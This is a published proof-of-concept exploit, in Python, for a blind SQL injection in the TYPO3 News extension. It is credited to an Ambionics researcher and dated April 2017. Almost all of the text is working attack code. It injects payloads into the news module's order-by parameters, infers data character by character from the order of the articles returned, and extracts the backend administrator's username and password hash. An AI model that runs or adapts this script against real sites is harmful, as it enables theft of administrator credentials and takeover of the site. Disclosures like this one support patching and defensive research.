TYPO3 News Module SQL Injection
Posted on 28 April 2017
# Exploit Title: TYPO3 News Module SQL Injection # Vendor Homepage: https://typo3.org/extensions/repository/view/news # Exploit Author: Charles FOL # Contact: https://twitter.com/ambionics # Website: https://www.ambionics.io/blog/typo3-news-module-sqli #!/usr/bin/python3 # TYPO3 News Module SQL Injection Exploit # https://www.ambionics.io/blog/typo3-news-module-sqli # cf # # The injection algorithm is not optimized, this is just meant to be a POC. # import requests import string session = requests.Session() session.proxies = {'http': 'localhost:8080'} # Change this URL = 'http://vmweb/typo3/index.php?id=8&no_cache=1' PATTERN0 = 'Article #1' PATTERN1 = 'Article #2' FULL_CHARSET = string.ascii_letters + string.digits + '$./' def blind(field, table, condition, charset): # We add 9 so that the result has two digits # If the length is superior to 100-9 it won't work size = blind_size( 'length(%s)+9' % field, table, condition, 2, string.digits ) size = int(size) - 9 data = blind_size( field, table, condition, size, charset ) return data def select_position(field, table, condition, position, char): payload = 'select(%s)from(%s)where(%s)' % ( field, table, condition ) payload = 'ord(substring((%s)from(%d)for(1)))' % (payload, position) payload = 'uid*(case((%s)=%d)when(1)then(1)else(-1)end)' % ( payload, ord(char) ) return payload def blind_size(field, table, condition, size, charset): string = '' for position in range(size): for char in charset: payload = select_position(field, table, condition, position+1, char) if test(payload): string += char print(string) break else: raise ValueError('Char was not found') return string def test(payload): response = session.post( URL, data=data(payload) ) response = response.text return response.index(PATTERN0) < response.index(PATTERN1) def data(payload): return { 'tx_news_pi1[overwriteDemand][order]': payload, 'tx_news_pi1[overwriteDemand][OrderByAllowed]': payload, 'tx_news_pi1[search][subject]': '', 'tx_news_pi1[search][minimumDate]': '2016-01-01', 'tx_news_pi1[search][maximumDate]': '2016-12-31', } # Exploit print("USERNAME:", blind('username', 'be_users', 'uid=1', string.ascii_letters)) print("PASSWORD:", blind('password', 'be_users', 'uid=1', FULL_CHARSET))